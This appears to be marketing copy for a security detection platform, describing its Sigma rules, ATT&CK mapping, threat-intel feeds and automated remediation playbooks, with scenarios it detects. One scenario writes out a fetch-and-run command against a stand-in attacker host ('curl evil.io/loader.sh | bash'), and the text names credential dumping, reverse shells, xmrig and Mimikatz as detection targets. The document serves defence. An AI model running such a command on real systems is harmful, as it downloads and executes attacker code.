Hunt across the entire fleet.
38 Sigma rules, MITRE ATT&CK mapping, cross-tenant threat intel fabric, 21 automated remediation playbooks. Detection in milliseconds.
What you get.
38 Sigma rules built-in
Cred dump, reverse shell, backup wipe, cryptominer, persistence, lateral movement, exfiltration — all covered, all updated weekly.
MITRE ATT&CK mapping
Every detection maps to a MITRE ATT&CK technique. Filter by tactic. Report in the language your SOC already speaks.
Cross-tenant intel fabric
When one tenant detects a new IOC, all tenants benefit. 12 free intel feeds bundled out-of-the-box (URLhaus, Feodo, MalwareBazaar, etc.).
21 automated playbooks
Kill process · quarantine file · isolate device · rotate credential · push DNS block · snapshot filesystem — all fire automatically based on detection severity.
12 ATT&CK tactics.
Real scenarios.
An employee runs `curl evil.io/loader.sh | bash`
SM-SIGMA-0118 reverse-shell signature fires within 200ms. Process killed, parent process logged, device flagged for review.
A device starts mining crypto silently
SM-SIGMA-0129 catches xmrig in command line. Process terminated, malware family identified, host network-isolated until investigation completes.
Mimikatz launched on a workstation
SM-SIGMA-0102 + memory-pattern detection both fire. Credential rotation auto-triggered for all sessions, full playbook executed.